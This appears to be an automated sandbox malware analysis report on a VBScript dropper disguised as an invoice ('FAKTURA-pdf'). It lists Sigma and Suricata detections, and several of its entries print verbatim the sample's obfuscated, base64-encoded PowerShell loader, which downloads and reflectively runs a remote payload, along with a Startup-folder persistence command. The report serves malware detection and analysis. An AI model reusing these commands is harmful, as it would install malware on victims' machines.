Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0M
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -comma
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", ProcessId: 4648, ProcessName: wscript.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -comma
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", ProcessId: 4648, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6264, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')'), ProcessId: 5944, ProcessName: powershell.exe
Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0M

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-04T11:25:23.864259+020028410751Malware Command and Control Activity Detected192.168.2.849709188.114.96.3443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: FAKTURA-pdf-466366332.vbsVirustotal: Detection: 9%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb; source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
